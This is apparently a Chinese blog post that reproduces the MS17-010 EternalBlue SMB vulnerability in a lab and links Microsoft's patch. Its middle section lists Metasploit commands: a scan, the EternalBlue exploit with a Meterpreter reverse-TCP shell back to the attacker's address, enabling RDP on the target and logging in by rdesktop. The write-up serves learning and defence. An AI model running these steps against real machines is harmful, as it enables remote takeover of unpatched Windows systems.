Metasploit-MS17-010(永恒之蓝 EternalBlue )复现

本文详细介绍了微软Windows系统中名为永恒之蓝(MS17-010)的安全漏洞,该漏洞允许远程执行代码,影响包括Win7、WinServer08在内的多个版本。文章提供了利用Metasploit进行漏洞复现的方法,以及官方补丁下载链接。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一. 概述

此安全更新程序修复了 Microsoft Windows 中的多个漏洞。如果攻击者向 Windows SMBv1 服务器发送特殊设计的消息,那么其中最严重的漏洞可能允许远程执行代码。

对于 Microsoft Windows 的所有受支持版本,此安全更新的等级为“严重”。有关详细信息,请参阅受影响的软件和漏洞严重等级部分。

此安全更新可通过更正 SMBv1 处理经特殊设计的请求的方式来修复这些漏洞。

有关这些漏洞的详细信息,请参阅漏洞信息部分。

EternalChampion 永恒冠军(CVE-2017-0146 & CVE-2017-0147)
EternalRomance 永恒浪漫(MS17_010)
Eternal Synergy永恒协作(CVE-2017-0143)
EternalBlue 永恒之蓝(MS17_010)

在这里插入图片描述
详情请查阅下方微软官方文档

概览
中文名:永恒之蓝
微软官方编号:MS17-010
CVE编号:CVE-2017-0143
类型:远程代码执行
官方评级:严重
影响系统:win7,winserver08,winserver08r2,win8.1,winserver12,winserver12r2,win10,winserver16

二. 复现

攻击机靶机
IP:192.168.199.130192.168.199.209
OS:kali-linuxwin7

ms17-010用的smb445端口
在这里插入图片描述

$ use auxiliary/scanner/smb/smb_ms17_010	//扫描模块
$ set rhosts 192.168.199.209
$ exploit

在这里插入图片描述

$ use exploit/windows/smb/ms17_010_eternalblue	//攻击模块
$ set payload windows/x64/meterpreter/reverse_tcp
$ set lhost 192.168.199.130
$ set rhosts 192.168.199.209
$ run getgui -e	//打开3389端口

在这里插入图片描述

在这里插入图片描述

靶机3389端口打开

在这里插入图片描述

$ rdesktop 192.168.199.209

在这里插入图片描述

三. 补丁

https://support.microsoft.com/zh-cn/help/4012598/title
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_abcdef

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值